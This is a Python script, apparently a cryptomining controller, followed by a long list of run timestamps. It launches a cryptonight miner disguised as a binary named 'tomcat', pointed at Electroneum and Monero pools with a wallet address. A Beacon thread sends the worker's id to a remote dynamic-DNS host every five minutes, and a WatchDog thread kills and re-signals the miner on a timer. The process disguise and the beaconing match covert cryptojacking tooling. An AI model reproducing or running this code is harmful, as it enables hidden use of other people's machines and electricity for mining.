import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:42:03.665154
#2018-02-17 17:31:01.623520
#2018-02-17 19:19:02.006006
#2018-02-17 21:08:06.319108
#2018-02-17 22:52:03.659055
#2018-02-18 00:37:01.339612
#2018-02-18 02:27:03.699452
#2018-02-18 04:14:07.124349
#2018-02-18 06:05:01.710896
#2018-02-18 07:54:04.064094
#2018-02-18 09:43:04.492185
#2018-02-18 11:29:01.260614
#2018-02-18 13:15:08.608254
#2018-02-18 15:06:03.949900
#2018-02-18 16:53:05.244549
#2018-02-18 18:41:06.472200
#2018-02-18 20:28:06.698485
#2018-02-18 22:13:06.573123
#2018-02-19 00:03:03.729773
#2018-02-19 01:49:01.804555
#2018-02-19 03:37:01.816966
#2018-02-19 05:22:01.780713
#2018-02-19 07:09:03.992519
#2018-02-19 08:58:05.771577
#2018-02-19 10:46:10.047002
#2018-02-19 12:33:07.847207
#2018-02-19 14:19:09.569851
#2018-02-19 16:08:08.454036
#2018-02-19 17:57:10.284147
#2018-02-19 19:45:04.309065
#2018-02-19 21:34:01.347299
#2018-02-19 23:20:02.979522
#2018-02-20 01:06:01.416890
#2018-02-20 02:54:07.618669
#2018-02-20 04:43:05.199714
#2018-02-20 06:27:03.588358
#2018-02-20 08:11:06.827092
#2018-02-20 09:56:05.114852
#2018-02-20 11:39:06.264603
#2018-02-20 13:26:01.913842
#2018-02-20 15:12:06.832410
#2018-02-20 16:58:05.745900
#2018-02-20 18:48:06.557771
#2018-02-20 20:34:07.699824
#2018-02-20 22:20:09.303856
#2018-02-21 00:02:02.184277
#2018-02-21 01:46:07.359205
#2018-02-21 03:36:06.000558
#2018-02-21 05:26:03.390587
#2018-02-21 07:13:06.726712
#2018-02-21 08:59:02.035323
#2018-02-21 10:47:04.266729
#2018-02-21 12:33:07.377143
#2018-02-21 14:20:06.949240
#2018-02-21 16:07:08.686275
#2018-02-21 17:58:04.936475
#2018-02-21 19:44:02.140566
#2018-02-21 21:32:01.741851
#2018-02-21 23:17:03.835928
#2018-02-22 01:07:01.313090
#2018-02-22 02:53:05.026264
#2018-02-22 04:40:09.022031
#2018-02-22 06:25:05.705058
#2018-02-22 08:13:07.278185
#2018-02-22 10:01:08.286133
#2018-02-22 11:45:09.311069
#2018-02-22 13:30:08.367033
#2018-02-22 15:18:06.153717
#2018-02-22 17:03:10.378767
#2018-02-22 18:51:04.356124
#2018-02-22 20:43:08.510385
#2018-02-22 22:29:07.434724
#2018-02-23 00:16:05.414769
#2018-02-23 02:07:03.201573
#2018-02-23 03:55:01.620033
#2018-02-23 05:31:06.952832
#2018-02-23 07:18:01.990875
#2018-02-23 09:22:03.784635
#2018-02-23 11:28:05.254597
#2018-02-23 13:19:07.811742
#2018-02-23 15:06:06.434003
#2018-02-23 16:55:06.915061
#2018-02-23 18:44:06.832188
#2018-02-23 20:32:01.866359
#2018-02-23 22:19:06.336797
#2018-02-24 00:04:03.619460
#2018-02-24 01:54:01.372329
#2018-02-24 03:47:04.483767
#2018-02-24 05:36:08.287807
#2018-02-24 07:22:06.400456
#2018-02-24 09:13:01.605001
#2018-02-24 11:12:01.361388
#2018-02-24 13:01:05.068600
#2018-02-24 14:48:06.454911
#2018-02-24 16:41:03.740425
#2018-02-24 18:29:05.807189
#2018-02-24 20:16:04.790033
#2018-02-24 22:08:04.604573
#2018-02-25 02:35:04.157785
#2018-02-25 06:16:05.527604
#2018-02-25 11:40:06.609718